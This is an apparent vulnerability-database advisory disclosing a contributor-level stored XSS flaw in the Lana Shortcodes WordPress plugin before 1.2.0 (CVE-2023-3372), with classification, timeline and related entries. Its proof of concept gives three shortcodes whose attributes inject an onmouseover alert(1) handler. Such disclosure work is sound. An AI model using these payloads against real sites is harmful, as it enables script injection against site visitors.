WordPress Plugin Vulnerabilities

Lana Shortcodes < 1.2.0 - Contributor+ Stored XSS

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which allows users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

Proof of Concept

Insert any of the following shortcodes in a page/post:

*Button shortcode
[lana_button size="md" type='" onmouseover="alert(1)" style="background:red;"']Lana Button[/lana_button]

*Icon shortcode
[lana_icon name='home" onmouseover="alert(1)" style="background:red;"']

*Label shortcode
[lana_label type='" onmouseover="alert(1)" style="background:red;"']New[/lana_label]

Affects Plugins

Plugin icon
lana-shortcodes
Fixed in 1.2.0

References

CVE
CVE-2023-3372

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
Webbernaut
Submitter
Webbernaut
Submitter website
https://www.webbernaut.com/
Verified
Yes
WPVDB ID
3396b734-9a10-4070-802d-f9d01cc6eb74

Timeline

Publicly Published
2023-06-26 (about 10 months ago)
Added
2023-06-26 (about 10 months ago)
Last Updated
2023-06-26 (about 10 months ago)

Other

Published
Title
Published
2022-01-19
Title
WOOCS < 1.3.7.5 - Reflected Cross-Site Scripting
Published
2024-03-18
Title
PowerPack Lite for Beaver Builder < 1.3.0.1 - Authenticated(Contributor+) Stored Cross-Site Scripting via element link
Published
2015-11-24
Title
SEO Rank Reporter <= 2.2.2 - Authenticated Reflected Cross-Site Scripting (XSS)
Published
2024-03-28
Title
Better Elementor Addons < 1.3.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
Published
2024-03-15
Title
Link Whisper Free < 0.6.9 - Reflected Cross-Site Scripting